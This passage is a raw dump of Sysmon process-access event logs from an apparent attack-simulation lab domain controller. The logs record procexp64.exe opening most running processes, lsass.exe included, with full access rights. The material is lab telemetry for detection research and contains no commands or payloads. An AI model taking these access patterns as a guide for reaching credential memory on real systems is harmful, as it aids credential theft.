Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786004Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786003Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786002Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786001Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786000Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785999Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785998Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785997Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785996Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785995Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785994Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785993Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 